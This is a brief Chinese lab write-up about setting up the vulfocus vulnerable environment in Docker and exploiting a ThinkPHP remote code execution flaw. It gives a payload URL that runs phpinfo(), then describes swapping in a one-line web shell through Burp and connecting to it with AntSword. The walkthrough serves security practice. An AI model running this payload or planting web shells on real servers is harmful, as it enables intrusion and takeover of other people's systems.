0
点赞
收藏
分享

微信扫一扫

【JavaScript】`Map` 数据结构

minute_5 2024-07-30 阅读 22
web安全

一、环境

vulfocus网上自行下载

启动命令:

 docker run -d --privileged -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.131.144  8e55f85571c8

一定添加--privileged不然只能拉取环境首页不显示

二、thinkphp远程代码执行

首页:

先开始资产收集:

端口:

目录:

网上搜索历史cve

输入pyload

http://192.168.131.144:29319/index.php?s=/index/index/name/${@phpinfo()})

命令执行

使用bp抓包

替换成一句话木马

使用蚁剑去连接

举报

相关推荐

0 条评论